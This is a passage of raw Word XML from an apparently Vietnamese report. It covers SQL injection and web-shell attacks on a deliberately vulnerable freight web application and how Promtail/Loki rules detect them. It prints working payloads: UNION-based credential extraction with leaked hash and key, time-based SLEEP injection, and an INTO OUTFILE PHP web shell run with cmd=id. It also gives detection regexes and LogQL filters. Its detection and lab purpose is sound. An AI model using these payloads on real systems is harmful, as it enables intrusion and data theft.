        <w:spacing w:line="288" w:lineRule="auto" w:before="0" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Payload khai thác:</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GET /ports?q=cn' UNION SELECT username, password_hash, api_key, 4 FROM dev.credentials-- - HTTP/1.1</w:t>
              <w:br/>
              <w:t xml:space="preserve">  Host: inlaneweb.ecotools.online</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-Bullet1"/>
        <w:spacing w:line="288" w:lineRule="auto" w:before="0" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Mã HTTP Response và nội dung trả về:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> Mã </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>HTTP 200 OK</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">, danh sách cảng biển bị chèn thêm dòng thông tin nhạy cảm của tài khoản quản trị: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>dev_admin | 392037dbba51f692776d6cefb6dd546d | DEV-KEY-super-secret-0xC0FFEE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">. Nếu thăm dò sai số cột bằng </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>ORDER BY 5</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">, phản hồi thông báo: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Unknown column '5' in 'order clause'</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Quy tắc Promtail thu thập:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> Quy tắc 4A khớp </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>union(\s+|%20|\+)select</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> trong Apache Access Log JSON, gán nhãn </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>vuln_category="sqli"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>level="critical"</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Hiển thị &amp; lọc LogQL:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> Panel 2 hiển thị địa chỉ IP kẻ tấn công và câu lệnh trích xuất dữ liệu; lọc bằng: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{container="ilfreight_web", vuln_category="sqli"} | json | query =~ "(?i).*union.*select.*"</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-H3"/>
        <w:spacing w:before="160" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>5.4.3. Tấn công suy diễn dữ liệu dựa vào độ trễ thời gian</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-Bullet1"/>
        <w:spacing w:line="288" w:lineRule="auto" w:before="0" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Điểm cuối bị tấn công:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>GET /api/track?tracking=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Lỗ hổng V4).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-Bullet1"/>
        <w:spacing w:line="288" w:lineRule="auto" w:before="0" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Payload khai thác:</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GET /api/track?tracking=ILF1042CN' AND SLEEP(5)-- - HTTP/1.1</w:t>
              <w:br/>
              <w:t xml:space="preserve">  Host: inlaneweb.ecotools.online</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-Bullet1"/>
        <w:spacing w:line="288" w:lineRule="auto" w:before="0" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Mã HTTP Response và nội dung trả về:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> Mã </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>HTTP 200 OK</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> với JSON bình thường </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>{"found": false}</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> (hoàn toàn nuốt lỗi trong nội dung trả về), nhưng thời gian phản hồi bị kéo dài bất thường: $\Delta t_{\text{response}} \ge 5000\text{ms}$ (5 giây).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-Bullet1"/>
        <w:spacing w:line="288" w:lineRule="auto" w:before="0" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Quy tắc Promtail thu thập:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> Quy tắc 4A khớp từ khóa </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>sleep\(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> trong tham số </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>tracking</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">, gán nhãn </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>vuln_category="sqli"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>level="critical"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>. Apache log ghi nhận trường độ trễ tăng vọt.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-Bullet1"/>
        <w:spacing w:line="288" w:lineRule="auto" w:before="0" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Hiển thị &amp; lọc LogQL:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> Panel 2 ghi nhận yêu cầu chứa </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>SLEEP(5)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>; biểu đồ độ trễ phân vị 99 của container tăng vọt từ 20ms lên trên 5000ms; lọc bằng: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{container="ilfreight_web", vuln_category="sqli"} | json | uri =~ "(?i).*(sleep|benchmark)\\("</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-H3"/>
        <w:spacing w:before="160" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>5.4.4. Tấn công tải tệp độc hại để thực thi lệnh trái phép từ xa</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-Bullet1"/>
        <w:spacing w:line="288" w:lineRule="auto" w:before="0" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Điểm cuối bị tấn công:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>GET /admin/console</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> (V12) và </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>GET /ports?q=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> (V1).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-Bullet1"/>
        <w:spacing w:line="288" w:lineRule="auto" w:before="0" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Payload khai thác:</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cn' UNION SELECT '&lt;?php if(isset($_REQUEST["cmd"])) system($_REQUEST["cmd"]); ?&gt;', 2, 3, 4 INTO OUTFILE '/var/lib/mysql-files/shell.php'-- -</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-Text"/>
        <w:spacing w:line="300" w:lineRule="auto" w:before="0" w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Sau đó thực thi lệnh: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>GET /files/shell.php?cmd=id</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-Bullet1"/>
        <w:spacing w:line="288" w:lineRule="auto" w:before="0" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Mã HTTP Response và nội dung trả về:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-Bullet2"/>
        <w:spacing w:line="288" w:lineRule="auto" w:before="0" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Yêu cầu ghi tệp: Trả về </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>HTTP 200 OK</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> (tạo file thành công).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-Bullet2"/>
        <w:spacing w:line="288" w:lineRule="auto" w:before="0" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Yêu cầu gọi backdoor: Trả về </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>HTTP 200 OK</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> với nội dung </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>uid=33(www-data) gid=33(www-data)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>, kẻ tấn công chính thức thực thi mã trái phép từ xa trên máy chủ.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-Bullet1"/>
        <w:spacing w:line="288" w:lineRule="auto" w:before="0" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Quy tắc Promtail thu thập:</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Promtail Quy tắc 4A bắt từ khóa </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>into(\s+|%20|\+)outfile</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> (gán nhãn </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>vuln_category="sqli"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>level="critical"</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Promtail Quy tắc 4D bắt cú pháp </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>cmd=id</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> hoặc </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>;\s*(cat|ls|id|whoami)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> gửi tới </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>shell.php</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">, gán nhãn </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>vuln_category="command_injection"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>level="critical"</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Hiển thị &amp; lọc LogQL:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> Panel 2 cảnh báo ghi tệp </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>INTO OUTFILE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">; Panel 5 báo động khẩn cấp hành vi gọi lệnh hệ thống </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>id</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>; lọc bằng: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xml:space="preserve">  {container="ilfreight_web", vuln_category="command_injection"} | json</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-H3"/>
        <w:spacing w:before="160" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>5.4.5. Bảng tổng hợp đối chiếu 14 kịch bản thực tế</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Mã Điểm Lỗi</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Điểm cuối kiểm tra</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Kỹ thuật và hành vi thực tế</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Cơ chế ngăn chặn của SonarQube và Semgrep khi kiểm tra mã nguồn</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Năng lực ghi vết của Promtail và Grafana Loki khi vận hành thực tế</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Mã HTTP trả về khi bị khai thác</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V1</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GET /ports?q=</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Ghép bảng trích xuất dữ liệu bằng UNION</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(Quy tắc </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="A31515"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>php:S2077</w:t>
            </w:r>
            <w:r>
              <w:rPr>
